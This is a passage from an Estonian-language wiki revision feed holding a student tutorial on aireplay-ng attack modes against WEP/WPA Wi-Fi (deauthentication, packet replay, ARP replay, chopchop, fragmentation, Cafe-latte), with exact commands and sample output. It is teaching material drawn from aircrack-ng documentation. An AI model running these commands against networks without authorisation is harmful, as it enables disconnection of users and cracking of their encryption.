Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0&lt;br /&gt;
       Read 165 packets...&lt;br /&gt;
&lt;br /&gt;
         Size: 86, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
 &lt;br /&gt;
         BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
         Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
         Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._..&amp;quot;&lt;br /&gt;
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C&lt;br /&gt;
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s&lt;br /&gt;
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...&amp;gt;.q.r.e.i.&lt;br /&gt;
         0x0050:  cfeb 4a72 be46                           ..Jr.F&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&lt;br /&gt;
 Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 &lt;br /&gt;
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms&lt;br /&gt;
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms&lt;br /&gt;
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms&lt;br /&gt;
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms&lt;br /&gt;
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms&lt;br /&gt;
 ...&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0001-123457.cap&lt;br /&gt;
 Saving keystream in replay_dec-0001-123456.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32793</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32793"/>
		<updated>2011-05-24T19:06:23Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Klientideta võrgu ründamine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
